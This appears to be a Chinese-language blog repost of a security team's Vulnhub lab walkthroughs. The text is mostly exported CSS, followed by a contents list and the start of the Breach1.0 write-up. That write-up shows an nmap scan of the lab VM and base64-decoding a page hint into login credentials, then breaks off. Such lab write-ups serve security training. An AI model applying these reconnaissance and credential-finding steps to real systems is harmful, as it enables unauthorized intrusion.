Vulnhub靶場題解

時間 2019-11-09
標籤 vulnhub 靶場題解简体版
原文原文鏈接
Vulnhub簡介

Vulnhub是一個提供各類漏洞環境的靶場平臺，供安全愛好者學習滲透使用，大部分環境是作好的虛擬機鏡像文件，鏡像預先設計了多種漏洞，須要使用VMware或者VirtualBox運行。每一個鏡像會有破解的目標，大可能是Boot2root，從啓動虛機到獲取操做系統的root權限和查看flag。網址：https://www.vulnhub.comjavascript
吧下面代碼複製另存爲後綴爲.html文件打開就能夠正常訪問了php
<!doctype html>
<html>
<head>
<meta charset='UTF-8'><meta name='viewport' content='width=device-width initial-scale=1'>
<title>Vulnhub靶場題解 - 紅日安全團隊</title><link href='https://fonts.googleapis.com/css?family=Open+Sans:400italic,700italic,700,400&subset=latin,latin-ext' rel='stylesheet' type='text/css' /><style type='text/css'>html {overflow-x: initial !important;}#write, body { height: auto; }
#write, #write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write ol, #write p, #write ul { position: relative; }
#write, #write h1, #write h2, #write h3, #write h4, #write h5, #write h6, #write p, #write pre { width: inherit; }
#write, pre { white-space: pre-wrap; }
.CodeMirror, .md-fences, table { text-align: left; }
.md-reset, a:active, a:hover { outline: 0px; }
.md-reset, .md-toc-item a { text-decoration: none; }
.MathJax_SVG, .md-reset { float: none; direction: ltr; }
:root { --bg-color:#ffffff; --text-color:#333333; }
html { font-size: 14px; background-color: var(--bg-color); color: var(--text-color); font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; -webkit-font-smoothing: antialiased; }
body { margin: 0px; padding: 0px; bottom: 0px; top: 0px; left: 0px; right: 0px; font-size: 1rem; line-height: 1.42857; overflow-x: hidden; background: inherit; }
a.url { word-break: break-all; }
.in-text-selection, ::selection { background: rgb(181, 214, 252); text-shadow: none; }
#write { margin: 0px auto; word-break: normal; word-wrap: break-word; padding-bottom: 70px; overflow-x: visible; }
.first-line-indent #write p .md-line { text-indent: 0px; }
.first-line-indent #write li, .first-line-indent #write p, .first-line-indent #write p .md-line:first-child { text-indent: 2em; }
.for-image #write { padding-left: 8px; padding-right: 8px; }
body.typora-export { padding-left: 30px; padding-right: 30px; }
@media screen and (max-width: 500px) {
  body.typora-export { padding-left: 0px; padding-right: 0px; }
  .CodeMirror-sizer { margin-left: 0px !important; }
  .CodeMirror-gutters { display: none !important; }
}
#write > blockquote:first-child, #write > div:first-child, #write > ol:first-child, #write > p:first-child, #write > pre:first-child, #write > table:first-child, #write > ul:first-child { margin-top: 30px; }
#write li > table:first-child { margin-top: -20px; }
img { max-width: 100%; vertical-align: middle; }
button, input, select, textarea { color: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; font-stretch: inherit; font-size: inherit; line-height: inherit; font-family: inherit; }
input[type="checkbox"], input[type="radio"] { line-height: normal; padding: 0px; }
*, ::after, ::before { box-sizing: border-box; }
h1 { font-size: 2rem; }
h2 { font-size: 1.8rem; }
h3 { font-size: 1.6rem; }
h4 { font-size: 1.4rem; }
h5 { font-size: 1.2rem; }
h6 { font-size: 1rem; }
p { -webkit-margin-before: 1rem; -webkit-margin-after: 1rem; -webkit-margin-start: 0px; -webkit-margin-end: 0px; }
.mathjax-block { margin-top: 0px; margin-bottom: 0px; -webkit-margin-before: 0px; -webkit-margin-after: 0px; }
.hidden { display: none; }
.md-blockmeta { color: rgb(204, 204, 204); font-weight: 700; font-style: italic; }
a { cursor: pointer; }
sup.md-footnote { padding: 2px 4px; background-color: rgba(238, 238, 238, 0.7); color: rgb(85, 85, 85); border-radius: 4px; }
#write input[type="checkbox"] { cursor: pointer; width: inherit; height: inherit; }
#write > figure:first-child { margin-top: 16px; }
figure { overflow-x: auto; margin: -8px 0px 0px -8px; max-width: calc(100% + 16px); padding: 8px; }
tr { break-inside: avoid; break-after: auto; }
thead { display: table-header-group; }
table { border-collapse: collapse; border-spacing: 0px; width: 100%; overflow: auto; break-inside: auto; }
.CodeMirror-line, .md-fences { break-inside: avoid; }
table.md-table td { min-width: 80px; }
.CodeMirror-gutters { border-right: 0px; background-color: inherit; margin-right: 4px; }
.CodeMirror-placeholder { opacity: 0.3; }
.CodeMirror pre { padding: 0px 4px; }
.CodeMirror-lines { padding: 0px; }
div.hr:focus { cursor: none; }
.md-fences { font-size: 0.9rem; display: block; overflow: visible; white-space: pre; background: inherit; position: relative !important; }
.md-diagram-panel { width: 100%; margin-top: 10px; text-align: center; padding-top: 0px; padding-bottom: 8px; overflow-x: auto; }
.md-fences .CodeMirror.CodeMirror-wrap { top: -1.6em; margin-bottom: -1.6em; }
.md-fences.mock-cm { white-space: pre-wrap; }
.show-fences-line-number .md-fences { padding-left: 0px; }
.show-fences-line-number .md-fences.mock-cm { padding-left: 40px; }
.footnotes { opacity: 0.8; font-size: 0.9rem; margin-top: 1em; margin-bottom: 1em; }
.footnotes + .footnotes { margin-top: 0px; }
.md-reset { margin: 0px; padding: 0px; border: 0px; vertical-align: top; background: 0px 0px; text-shadow: none; position: static; width: auto; height: auto; white-space: nowrap; cursor: inherit; -webkit-tap-highlight-color: transparent; line-height: normal; font-weight: 400; text-align: left; box-sizing: content-box; }
.md-toc-inner, a img, img a { cursor: pointer; }
li div { padding-top: 0px; }
blockquote { margin: 1rem 0px; }
li .mathjax-block, li p { margin: 0.5rem 0px; }
li { margin: 0px; position: relative; }
blockquote > :last-child { margin-bottom: 0px; }
blockquote > :first-child { margin-top: 0px; }
.footnotes-area { color: rgb(136, 136, 136); margin-top: 0.714rem; padding-bottom: 0.143rem; white-space: normal; }
@media print {
  body, html { border: 1px solid transparent; height: 99%; break-after: avoid; break-before: avoid; }
  #write { margin-top: 0px; border-color: transparent !important; }
  .typora-export * { -webkit-print-color-adjust: exact; }
  h1, h2, h3, h4, h5, h6 { break-after: avoid-page; orphans: 2; }
  p { orphans: 4; }
  html.blink-to-pdf { font-size: 13px; }
  .typora-export #write { padding-left: 1cm; padding-right: 1cm; padding-bottom: 0px; break-after: avoid; }
  .typora-export #write::after { height: 0px; }
  @page { margin: 20mm 0px; }
}
.footnote-line { white-space: pre-wrap; margin-top: 0.714em; font-size: 0.7em; }
pre.md-meta-block { font-size: 0.8rem; min-height: 0.8rem; white-space: pre-wrap; background: rgb(204, 204, 204); display: block; overflow-x: hidden; }
p > img:only-child { display: block; margin: auto; }
.md-line > .md-image:only-child, p > .md-image:only-child { display: inline-block; width: 100%; text-align: center; }
.mathjax-block:not(:empty)::after, .md-toc-content::after, .md-toc::after { display: none; }
#write .MathJax_Display { margin: 0.8em 0px 0px; }
.mathjax-block { white-space: pre; overflow: hidden; width: 100%; }
p + .mathjax-block { margin-top: -1.143rem; }
[contenteditable="true"]:active, [contenteditable="true"]:focus { outline: 0px; box-shadow: none; }
.md-task-list-item { position: relative; list-style-type: none; }
.task-list-item.md-task-list-item { padding-left: 0px; }
.md-task-list-item > input { position: absolute; top: 0px; left: 0px; margin-left: -1.2em; margin-top: calc(1em - 10px); }
.math { font-size: 1rem; }
.md-toc { min-height: 3.58rem; position: relative; font-size: 0.9rem; border-radius: 10px; }
.MathJax_SVG, .mathjax-block .MathJax_SVG_Display { text-indent: 0px; max-width: none; max-height: none; min-height: 0px; }
.md-toc-content { position: relative; margin-left: 0px; }
.md-toc-item { display: block; color: rgb(65, 131, 196); }
.md-toc-inner:hover { }
.md-toc-inner { display: inline-block; }
.md-toc-h1 .md-toc-inner { margin-left: 0px; font-weight: 700; }
.md-toc-h2 .md-toc-inner { margin-left: 2em; }
.md-toc-h3 .md-toc-inner { margin-left: 4em; }
.md-toc-h4 .md-toc-inner { margin-left: 6em; }
.md-toc-h5 .md-toc-inner { margin-left: 8em; }
.md-toc-h6 .md-toc-inner { margin-left: 10em; }
@media screen and (max-width: 48em) {
  .md-toc-h3 .md-toc-inner { margin-left: 3.5em; }
  .md-toc-h4 .md-toc-inner { margin-left: 5em; }
  .md-toc-h5 .md-toc-inner { margin-left: 6.5em; }
  .md-toc-h6 .md-toc-inner { margin-left: 8em; }
}
a.md-toc-inner { font-size: inherit; font-style: inherit; font-weight: inherit; line-height: inherit; }
.footnote-line a:not(.reversefootnote) { color: inherit; }
.md-attr { display: none; }
.md-fn-count::after { content: "."; }
code, pre, tt { font-family: var(--monospace); }
.md-comment { color: rgb(162, 127, 3); opacity: 0.8; font-family: var(--monospace); }
code { text-align: left; }
a.md-print-anchor { border-width: initial !important; border-style: none !important; border-color: initial !important; display: inline-block !important; position: absolute !important; width: 1px !important; right: 0px !important; outline: 0px !important; background: 0px 0px !important; text-decoration: initial !important; text-shadow: initial !important; }
.md-inline-math .MathJax_SVG .noError { display: none !important; }
.mathjax-block .MathJax_SVG_Display { text-align: center; margin: 1em 0px; position: relative; min-width: 100%; width: auto; display: block !important; }
.MathJax_SVG_Display, .md-inline-math .MathJax_SVG_Display { width: auto; margin: inherit; display: inline-block !important; }
.MathJax_SVG .MJX-monospace { font-family: monospace; }
.MathJax_SVG .MJX-sans-serif { font-family: sans-serif; }
.MathJax_SVG { display: inline; font-style: normal; font-weight: 400; line-height: normal; zoom: 90%; text-align: left; text-transform: none; letter-spacing: normal; word-spacing: normal; word-wrap: normal; white-space: nowrap; min-width: 0px; border: 0px; padding: 0px; margin: 0px; }
.MathJax_SVG * { transition: none; }
.os-windows.monocolor-emoji .md-emoji { font-family: "Segoe UI Symbol", sans-serif; }
.md-diagram-panel > svg, [lang="flow"] svg, [lang="mermaid"] svg { max-width: 100%; }
[lang="mermaid"] .node text { font-size: 1rem; }
table tr th { border-bottom: 0px; }
 
 
.CodeMirror, .CodeMirror-sizer { position: relative; }
.CodeMirror.cm-s-inner { background: inherit; }
.fences-no-line-wrapping .md-fences .CodeMirror { margin-top: -30px; }
.CodeMirror-scroll { overflow-y: hidden; overflow-x: auto; }
.CodeMirror-lines { padding: 4px 0px; }
.CodeMirror-gutter-filler, .CodeMirror-scrollbar-filler { background-color: rgb(255, 255, 255); }
.CodeMirror-scroll, .cm-s-inner .CodeMirror-activeline-background { background: inherit; }
.CodeMirror-linenumber { padding: 0px 3px 0px 5px; text-align: right; color: rgb(153, 153, 153); }
.cm-s-inner .cm-keyword { color: rgb(119, 0, 136); }
.cm-s-inner .cm-atom, .cm-s-inner.cm-atom { color: rgb(34, 17, 153); }
.cm-s-inner .cm-number { color: rgb(17, 102, 68); }
.cm-s-inner .cm-def { color: rgb(0, 0, 255); }
.cm-s-inner .cm-variable { color: rgb(0, 0, 0); }
.cm-s-inner .cm-variable-2 { color: rgb(0, 85, 170); }
.cm-s-inner .cm-variable-3 { color: rgb(0, 136, 85); }
.cm-s-inner .cm-string { color: rgb(170, 17, 17); }
.cm-s-inner .cm-property { color: rgb(0, 0, 0); }
.cm-s-inner .cm-operator { color: rgb(152, 26, 26); }
.cm-s-inner .cm-comment, .cm-s-inner.cm-comment { color: rgb(170, 85, 0); }
.cm-s-inner .cm-string-2 { color: rgb(255, 85, 0); }
.cm-s-inner .cm-meta, .cm-s-inner .cm-qualifier { color: rgb(85, 85, 85); }
.cm-s-inner .cm-builtin { color: rgb(51, 0, 170); }
.cm-s-inner .cm-bracket { color: rgb(153, 153, 119); }
.cm-s-inner .cm-tag { color: rgb(17, 119, 0); }
.cm-s-inner .cm-attribute { color: rgb(0, 0, 204); }
.cm-s-inner .cm-header, .cm-s-inner.cm-header { color: rgb(0, 0, 255); }
.cm-s-inner .cm-quote, .cm-s-inner.cm-quote { color: rgb(0, 153, 0); }
.cm-s-inner .cm-hr, .cm-s-inner.cm-hr { color: rgb(153, 153, 153); }
.cm-s-inner .cm-link, .cm-s-inner.cm-link { color: rgb(0, 0, 204); }
.cm-negative { color: rgb(221, 68, 68); }
.cm-positive { color: rgb(34, 153, 34); }
.cm-header, .cm-strong { font-weight: 700; }
.cm-del { text-decoration: line-through; }
.cm-em { font-style: italic; }
.cm-link { text-decoration: underline; }
.cm-error, .cm-invalidchar { color: red; }
.cm-constant { color: rgb(38, 139, 210); }
.cm-defined { color: rgb(181, 137, 0); }
div.CodeMirror span.CodeMirror-matchingbracket { color: rgb(0, 255, 0); }
div.CodeMirror span.CodeMirror-nonmatchingbracket { color: rgb(255, 34, 34); }
.CodeMirror { height: auto; overflow: hidden; }
.CodeMirror-scroll { margin-bottom: -30px; padding-bottom: 30px; height: 100%; outline: 0px; position: relative; box-sizing: content-box; }
.CodeMirror-gutter-filler, .CodeMirror-hscrollbar, .CodeMirror-scrollbar-filler, .CodeMirror-vscrollbar { position: absolute; z-index: 6; display: none; }
.CodeMirror-vscrollbar { right: 0px; top: 0px; overflow-x: hidden; overflow-y: scroll; }
.CodeMirror-hscrollbar { bottom: 0px; left: 0px; overflow-y: hidden; overflow-x: scroll; }
.CodeMirror-scrollbar-filler { right: 0px; bottom: 0px; }
.CodeMirror-gutter-filler { left: 0px; bottom: 0px; }
.CodeMirror-gutters { border-right: 1px solid rgb(221, 221, 221); background: inherit; white-space: nowrap; position: absolute; left: 0px; top: 0px; padding-bottom: 30px; z-index: 3; }
.CodeMirror-gutter { white-space: normal; height: 100%; box-sizing: content-box; padding-bottom: 30px; margin-bottom: -32px; display: inline-block; }
.CodeMirror-gutter-wrapper { position: absolute; z-index: 4; background: 0px 0px !important; border: none !important; }
.CodeMirror-gutter-background { position: absolute; top: 0px; bottom: 0px; z-index: 4; }
.CodeMirror-gutter-elt { position: absolute; cursor: default; z-index: 4; }
.CodeMirror-lines { cursor: text; }
.CodeMirror pre { border-radius: 0px; border-width: 0px; background: 0px 0px; font-family: inherit; font-size: inherit; margin: 0px; white-space: pre; word-wrap: normal; color: inherit; z-index: 2; position: relative; overflow: visible; }
.CodeMirror-wrap pre { word-wrap: break-word; white-space: pre-wrap; word-break: normal; }
.CodeMirror-code pre { border-right: 30px solid transparent; width: fit-content; }
.CodeMirror-wrap .CodeMirror-code pre { border-right: none; width: auto; }
.CodeMirror-linebackground { position: absolute; left: 0px; right: 0px; top: 0px; bottom: 0px; z-index: 0; }
.CodeMirror-linewidget { position: relative; z-index: 2; overflow: auto; }
.CodeMirror-wrap .CodeMirror-scroll { overflow-x: hidden; }
.CodeMirror-measure { position: absolute; width: 100%; height: 0px; overflow: hidden; visibility: hidden; }
.CodeMirror-measure pre { position: static; }
.CodeMirror div.CodeMirror-cursor { position: absolute; border-right: none; width: 0px; visibility: hidden; }
.CodeMirror-focused div.CodeMirror-cursor { visibility: inherit; }
.CodeMirror-selected { background: rgb(217, 217, 217); }
.CodeMirror-focused .CodeMirror-selected { background: rgb(215, 212, 240); }
.cm-searching { background: rgba(255, 255, 0, 0.4); }
@media print {
  .CodeMirror div.CodeMirror-cursor { visibility: hidden; }
}
.CodeMirror-lint-markers { width: 16px; }
.CodeMirror-lint-tooltip { background-color: infobackground; border: 1px solid rgb(0, 0, 0); border-radius: 4px; color: infotext; font-family: var(--monospace); overflow: hidden; padding: 2px 5px; position: fixed; white-space: pre-wrap; z-index: 10000; max-width: 600px; opacity: 0; transition: opacity 0.4s; font-size: 0.8em; }
.CodeMirror-lint-mark-error, .CodeMirror-lint-mark-warning { background-position: left bottom; background-repeat: repeat-x; }
.CodeMirror-lint-mark-error { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAAADCAYAAAC09K7GAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9sJDw4cOCW1/KIAAAAZdEVYdENvbW1lbnQAQ3JlYXRlZCB3aXRoIEdJTVBXgQ4XAAAAHElEQVQI12NggIL/DAz/GdA5/xkY/qPKMDAwAADLZwf5rvm+LQAAAABJRU5ErkJggg=="); }
.CodeMirror-lint-marker-error, .CodeMirror-lint-marker-warning { background-position: center center; background-repeat: no-repeat; cursor: pointer; display: inline-block; height: 16px; width: 16px; vertical-align: middle; position: relative; }
.CodeMirror-lint-message-error, .CodeMirror-lint-message-warning { padding-left: 18px; background-position: left top; background-repeat: no-repeat; }
.CodeMirror-lint-marker-error, .CodeMirror-lint-message-error { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAHlBMVEW7AAC7AACxAAC7AAC7AAAAAAC4AAC5AAD///+7AAAUdclpAAAABnRSTlMXnORSiwCK0ZKSAAAATUlEQVR42mWPOQ7AQAgDuQLx/z8csYRmPRIFIwRGnosRrpamvkKi0FTIiMASR3hhKW+hAN6/tIWhu9PDWiTGNEkTtIOucA5Oyr9ckPgAWm0GPBog6v4AAAAASUVORK5CYII="); }
.CodeMirror-lint-marker-warning, .CodeMirror-lint-message-warning { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAANlBMVEX/uwDvrwD/uwD/uwD/uwD/uwD/uwD/uwD/uwD6twD/uwAAAADurwD2tQD7uAD+ugAAAAD/uwDhmeTRAAAADHRSTlMJ8mN1EYcbmiixgACm7WbuAAAAVklEQVR42n3PUQqAIBBFUU1LLc3u/jdbOJoW1P08DA9Gba8+YWJ6gNJoNYIBzAA2chBth5kLmG9YUoG0NHAUwFXwO9LuBQL1giCQb8gC9Oro2vp5rncCIY8L8uEx5ZkAAAAASUVORK5CYII="); }
.CodeMirror-lint-marker-multiple { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAcAAAAHCAMAAADzjKfhAAAACVBMVEUAAAAAAAC/v7914kyHAAAAAXRSTlMAQObYZgAAACNJREFUeNo1ioEJAAAIwmz/H90iFFSGJgFMe3gaLZ0od+9/AQZ0ADosbYraAAAAAElFTkSuQmCC"); background-repeat: no-repeat; background-position: right bottom; width: 100%; height: 100%; }
 
 
:root { --side-bar-bg-color: #fafafa; --control-text-color: #777; }
@font-face { font-family: "Open Sans"; font-style: normal; font-weight: normal; src: local("Open Sans Regular"), url("./github/400.woff") format("woff"); }
@font-face { font-family: "Open Sans"; font-style: italic; font-weight: normal; src: local("Open Sans Italic"), url("./github/400i.woff") format("woff"); }
@font-face { font-family: "Open Sans"; font-style: normal; font-weight: bold; src: local("Open Sans Bold"), url("./github/700.woff") format("woff"); }
@font-face { font-family: "Open Sans"; font-style: italic; font-weight: bold; src: local("Open Sans Bold Italic"), url("./github/700i.woff") format("woff"); }
html { font-size: 16px; }
body { font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; color: rgb(51, 51, 51); line-height: 1.6; }
#write { max-width: 860px; margin: 0px auto; padding: 20px 30px 100px; }
#write > ul:first-child, #write > ol:first-child { margin-top: 30px; }
body > :first-child { margin-top: 0px !important; }
body > :last-child { margin-bottom: 0px !important; }
a { color: rgb(65, 131, 196); }
h1, h2, h3, h4, h5, h6 { position: relative; margin-top: 1rem; margin-bottom: 1rem; font-weight: bold; line-height: 1.4; cursor: text; }
h1:hover a.anchor, h2:hover a.anchor, h3:hover a.anchor, h4:hover a.anchor, h5:hover a.anchor, h6:hover a.anchor { text-decoration: none; }
h1 tt, h1 code { font-size: inherit; }
h2 tt, h2 code { font-size: inherit; }
h3 tt, h3 code { font-size: inherit; }
h4 tt, h4 code { font-size: inherit; }
h5 tt, h5 code { font-size: inherit; }
h6 tt, h6 code { font-size: inherit; }
h1 { padding-bottom: 0.3em; font-size: 2.25em; line-height: 1.2; border-bottom: 1px solid rgb(238, 238, 238); }
h2 { padding-bottom: 0.3em; font-size: 1.75em; line-height: 1.225; border-bottom: 1px solid rgb(238, 238, 238); }
h3 { font-size: 1.5em; line-height: 1.43; }
h4 { font-size: 1.25em; }
h5 { font-size: 1em; }
h6 { font-size: 1em; color: rgb(119, 119, 119); }
p, blockquote, ul, ol, dl, table { margin: 0.8em 0px; }
li > ol, li > ul { margin: 0px; }
hr { height: 4px; padding: 0px; margin: 16px 0px; background-color: rgb(231, 231, 231); border-width: 0px 0px 1px; border-style: none none solid; border-top-color: initial; border-right-color: initial; border-left-color: initial; border-image: initial; overflow: hidden; box-sizing: content-box; border-bottom-color: rgb(221, 221, 221); }
body > h2:first-child { margin-top: 0px; padding-top: 0px; }
body > h1:first-child { margin-top: 0px; padding-top: 0px; }
body > h1:first-child + h2 { margin-top: 0px; padding-top: 0px; }
body > h3:first-child, body > h4:first-child, body > h5:first-child, body > h6:first-child { margin-top: 0px; padding-top: 0px; }
a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 { margin-top: 0px; padding-top: 0px; }
h1 p, h2 p, h3 p, h4 p, h5 p, h6 p { margin-top: 0px; }
li p.first { display: inline-block; }
ul, ol { padding-left: 30px; }
ul:first-child, ol:first-child { margin-top: 0px; }
ul:last-child, ol:last-child { margin-bottom: 0px; }
blockquote { border-left: 4px solid rgb(221, 221, 221); padding: 0px 15px; color: rgb(119, 119, 119); }
blockquote blockquote { padding-right: 0px; }
table { padding: 0px; word-break: initial; }
table tr { border-top: 1px solid rgb(204, 204, 204); margin: 0px; padding: 0px; }
table tr:nth-child(2n) { background-color: rgb(248, 248, 248); }
table tr th { font-weight: bold; border-width: 1px 1px 0px; border-top-style: solid; border-right-style: solid; border-left-style: solid; border-top-color: rgb(204, 204, 204); border-right-color: rgb(204, 204, 204); border-left-color: rgb(204, 204, 204); border-image: initial; border-bottom-style: initial; border-bottom-color: initial; text-align: left; margin: 0px; padding: 6px 13px; }
table tr td { border: 1px solid rgb(204, 204, 204); text-align: left; margin: 0px; padding: 6px 13px; }
table tr th:first-child, table tr td:first-child { margin-top: 0px; }
table tr th:last-child, table tr td:last-child { margin-bottom: 0px; }
.CodeMirror-gutters { border-right: 1px solid rgb(221, 221, 221); }
.md-fences, code, tt { border: 1px solid rgb(221, 221, 221); background-color: rgb(248, 248, 248); border-radius: 3px; font-family: Consolas, "Liberation Mono", Courier, monospace; padding: 2px 4px 0px; font-size: 0.9em; }
.md-fences { margin-bottom: 15px; margin-top: 15px; padding: 8px 1em 6px; }
.md-task-list-item > input { margin-left: -1.3em; }
@media screen and (min-width: 914px) {
}
@media print {
  html { font-size: 13px; }
  table, pre { break-inside: avoid; }
  pre { word-wrap: break-word; }
}
.md-fences { background-color: rgb(248, 248, 248); }
#write pre.md-meta-block { padding: 1rem; font-size: 85%; line-height: 1.45; background-color: rgb(247, 247, 247); border: 0px; border-radius: 3px; color: rgb(119, 119, 119); margin-top: 0px !important; }
.mathjax-block > .code-tooltip { bottom: 0.375rem; }
#write > h3.md-focus::before { left: -1.5625rem; top: 0.375rem; }
#write > h4.md-focus::before { left: -1.5625rem; top: 0.285714rem; }
#write > h5.md-focus::before { left: -1.5625rem; top: 0.285714rem; }
#write > h6.md-focus::before { left: -1.5625rem; top: 0.285714rem; }
.md-image > .md-meta { border-radius: 3px; font-family: Consolas, "Liberation Mono", Courier, monospace; padding: 2px 0px 0px 4px; font-size: 0.9em; color: inherit; }
.md-tag { color: inherit; }
.md-toc { margin-top: 20px; padding-bottom: 20px; }
.sidebar-tabs { border-bottom: none; }
#typora-quick-open { border: 1px solid rgb(221, 221, 221); background-color: rgb(248, 248, 248); }
#typora-quick-open-item { background-color: rgb(250, 250, 250); border-color: rgb(254, 254, 254) rgb(229, 229, 229) rgb(229, 229, 229) rgb(238, 238, 238); border-style: solid; border-width: 1px; }
#md-notification::before { top: 10px; }
.on-focus-mode blockquote { border-left-color: rgba(85, 85, 85, 0.12); }
header, .context-menu, .megamenu-content, footer { font-family: "Segoe UI", Arial, sans-serif; }
.file-node-content:hover .file-node-icon, .file-node-content:hover .file-node-open-state { visibility: visible; }
.mac-seamless-mode #typora-sidebar { background-color: var(--side-bar-bg-color); }
.md-lang { color: rgb(180, 101, 77); }
.html-for-mac .context-menu { --item-hover-bg-color: #E6F0FE; }
 
 
 
 
 
 .typora-export p, .typora-export .footnote-line {white-space: normal;} 
</style>
</head>
<body class='typora-export os-windows' >
<div  id='write'  class = 'is-node'><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/vulhub%E9%9D%B6%E5%9C%BA_meitu_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n7001' class='md-header-anchor '></a> </h2><p> </p><p> </p><h2><a name='header-n7006' class='md-header-anchor '></a>目錄</h2><h4><a name='header-n7007' class='md-header-anchor '></a>Vulnhub滲透測試練習（一）-------------------------------Breach1.0</h4><h4><a name='header-n7008' class='md-header-anchor '></a>Vulnhub滲透測試練習（二） ------------------------------Billu_b0x</h4><h4><a name='header-n7009' class='md-header-anchor '></a>Vulnhub滲透測試練習（三） -------------------------------Bulldog1</h4><h4><a name='header-n7010' class='md-header-anchor '></a>Vulnhub滲透測試練習（四）---------------------------------Acid</h4><h4><a name='header-n7011' class='md-header-anchor '></a>Vulnhub滲透測試練習（五）---------------------------------LazysysAdmin-1</h4><h4><a name='header-n7012' class='md-header-anchor '></a>Vulnhub滲透測試練習（六）---------------------------------Freshly</h4><h4><a name='header-n7013' class='md-header-anchor '></a>Vulnhub滲透測試練習（七）---------------------------------FristiLeaks v1.3</h4><h4><a name='header-n7014' class='md-header-anchor '></a>Vulnhub滲透測試練習（八）---------------------------------The Ether</h4><h4><a name='header-n7015' class='md-header-anchor '></a>Vulnhub滲透測試練習（九）---------------------------------zico2</h4><h4><a name='header-n7016' class='md-header-anchor '></a>Vulnhub滲透測試練習（十）---------------------------------Quaoar</h4><h4><a name='header-n7017' class='md-header-anchor '></a>Vulnhub滲透測試練習（十一）---------------------------------SickOs 1.1</h4><h4><a name='header-n7018' class='md-header-anchor '></a>Vulnhub滲透測試練習（十二）---------------------------------BSides-Vancouver-2018-Workshop</h4><h4><a name='header-n7019' class='md-header-anchor '></a>Vulnhub滲透測試練習（十三）---------------------------------Kioptrix 1</h4><h4><a name='header-n7020' class='md-header-anchor '></a>Vulnhub滲透測試練習（十四）----------------------------------Zico2</h4><h4><a name='header-n7021' class='md-header-anchor '></a>Vulnhub滲透測試練習（十五）----------------------------------Kioptrix 3</h4><h4><a name='header-n7022' class='md-header-anchor '></a>Vulnhub滲透測試練習（十六）----------------------------------Kioptrix 4</h4><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><p> </p><h1><a name='header-n7037' class='md-header-anchor '></a>Vulnhub靶場題解 - 紅日安全團隊</h1><h2><a name='header-n7038' class='md-header-anchor '></a>Vulnhub簡介</h2><p>Vulnhub是一個提供各類漏洞環境的靶場平臺，供安全愛好者學習滲透使用，大部分環境是作好的虛擬機鏡像文件，鏡像預先設計了多種漏洞，須要使用VMware或者VirtualBox運行。每一個鏡像會有破解的目標，大可能是Boot2root，從啓動虛機到獲取操做系統的root權限和查看flag。網址：<a href='https://www.vulnhub.com' target='_blank' class='url'>https://www.vulnhub.com</a></p><h1><a name='header-n7041' class='md-header-anchor '></a>第一節 Breach1.0</h1><h2><a name='header-n7042' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n7044' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/breach/Breach-1.0.zip' target='_blank' class='url'>https://download.vulnhub.com/breach/Breach-1.0.zip</a></p><h3><a name='header-n7047' class='md-header-anchor '></a>靶機說明</h3><p>Breach1.0是一個難度爲初級到中級的BooT2Root/CTF挑戰。</p><p>VM虛機配置有靜態IP地址（192.168.110.140），須要將虛擬機網卡設置爲host-only方式組網。很是感謝Knightmare和rastamouse進行測試和提供反饋。做者期待你們寫出文章，特別是經過非預期的方式獲取root權限。</p><h3><a name='header-n7052' class='md-header-anchor '></a>目標</h3><p>Boot to root：得到root權限，查看flag。</p><h3><a name='header-n7055' class='md-header-anchor '></a>運行環境</h3><ul><li>靶機：網絡鏈接方式設置爲主機模式（host-only），靜態IP是192.168.110.140。</li><li>攻擊機：同網段下有Windows攻擊機（物理機），IP地址：192.168.110.220，安裝有Nmap、Burpsuit、Wireshark、Sqlmap、nc、Python2.七、JDK、DirBuster、AWVS、Nessus等滲透工具，也可使用Kali Linux攻擊機。</li></ul><h2><a name='header-n7063' class='md-header-anchor '></a>信息收集</h2><ul><li>端口服務識別</li></ul><p>啓動Breach1.0虛擬機，因爲IP已知，使用nmap掃描端口，並作服務識別和深度掃描（加-A參數），掃描結果保存到txt文件，命令：</p><p><code>nmap -v -A 192.168.110.140 -oN Breach.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現端口幾乎全開放了，顯然是有問題，虛擬機對端口掃描作了一些防禦措施，直接訪問80端口，進入web首頁：<code>http://192.168.110.140/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7078' class='md-header-anchor '></a>漏洞挖掘</h2><h3><a name='header-n7079' class='md-header-anchor '></a>0x01：查看首頁源碼，解碼獲得密碼</h3><p>(1) 查看首頁源碼，發現提示：<code>Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo</code> 這是一串base64編碼。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) 將其複製到Burpsuit Decoder進行base64解碼，解密後發現仍是base64編碼，繼續base64解碼，獲得<code>pgibbons:damnitfeel$goodtobeagang$ta</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n7088' class='md-header-anchor '></a>0x02：登陸cms，查看郵件，下載包含SSL證書的密鑰庫keystore文件</h3><p>(1) 點擊首頁的圖片，進入<code>initech.html</code></p><p><img 